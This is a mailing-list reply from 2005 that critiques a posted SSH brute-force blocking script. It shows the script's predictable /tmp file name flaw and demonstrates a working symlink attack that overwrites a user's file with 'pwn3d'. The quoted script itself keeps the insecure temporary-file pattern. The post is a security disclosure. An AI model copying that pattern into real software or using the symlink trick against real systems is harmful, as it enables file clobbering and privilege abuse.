Full Disclosure mailing list archives
Re: SSH Bruteforce blocking script
From: Alejandro Barrera <abarrera () iron-gate net>
Date: Fri, 2 Sep 2005 10:03:57 +0200
Well, we apreciate your script although I would preffer to stay with my nice bruteforcing attempts than to create an insecure temporary file bug: ergosum@sparta:~$ cat test.sh #!/bin/sh SCRIPT_NAME=$(basename $0) TMP_FILE="/tmp/${SCRIPT_NAME}.$$" touch ${TMP_FILE} echo "pwn3d" > ${TMP_FILE} exit ergosum@sparta:~$ cat data pr0n g0ld collection: .... ergosum@sparta:~$ ln -s /home/ergosum/data /tmp/test.sh.18359 ergosum@sparta:~$ ln -s /home/ergosum/data /tmp/test.sh.18361 ergosum@sparta:~$ ln -s /home/ergosum/data /tmp/test.sh.18362 ergosum@sparta:~$ ./test.sh ergosum@sparta:~$ cat data pwn3d
#!/bin/ksh # # ssh_brute_blocker # # 05/07/2004 15:05 - Michael L. Benjamin #
SCRIPT_NAME=$(basename $0) LOG_FILE="/var/log/secure" DENY_FILE="/etc/hosts.deny" TMP_FILE="/tmp/${SCRIPT_NAME}.$$" INBOUND_IP="" INLINE="" GUESS_COUNT=0 PERMIT_GUESS=4
touch ${TMP_FILE}
while : do
tail -10000 ${LOG_FILE} | grep "Failed password for illegal user" | awk -F"from" {'print $2'} | awk {'print $1'} | uniq > ${TMP_FILE}
-- Alejandro Barrera GarcĂa-Orea R&D Engineer c/ Alcala 268 28027 Madrid Office: +34 91 326 66 11 Fax: +34 91 326 66 11 e-mail: abarrera () iron-gate net _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- SSH Bruteforce blocking script Michael L Benjamin (Sep 02)
- Re: SSH Bruteforce blocking script Alejandro Barrera (Sep 02)
- Re: SSH Bruteforce blocking script Christoph Moench-Tegeder (Sep 02)
- Re: SSH Bruteforce blocking script Gerald Holl (Sep 03)
- <Possible follow-ups>
- RE: SSH Bruteforce blocking script Michael L Benjamin (Sep 02)
- RE: SSH Bruteforce blocking script Michael L Benjamin (Sep 02)
- RE: SSH Bruteforce blocking script Michael L Benjamin (Sep 02)
- Re: SSH Bruteforce blocking script Christoph Moench-Tegeder (Sep 02)
- Re: SSH Bruteforce blocking script Pedro Hugo (Sep 02)
- RE: SSH Bruteforce blocking script Michael L Benjamin (Sep 02)
- Re: SSH Bruteforce blocking script miah (Sep 02)
- RE: SSH Bruteforce blocking script Michael L Benjamin (Sep 04)
(Thread continues...)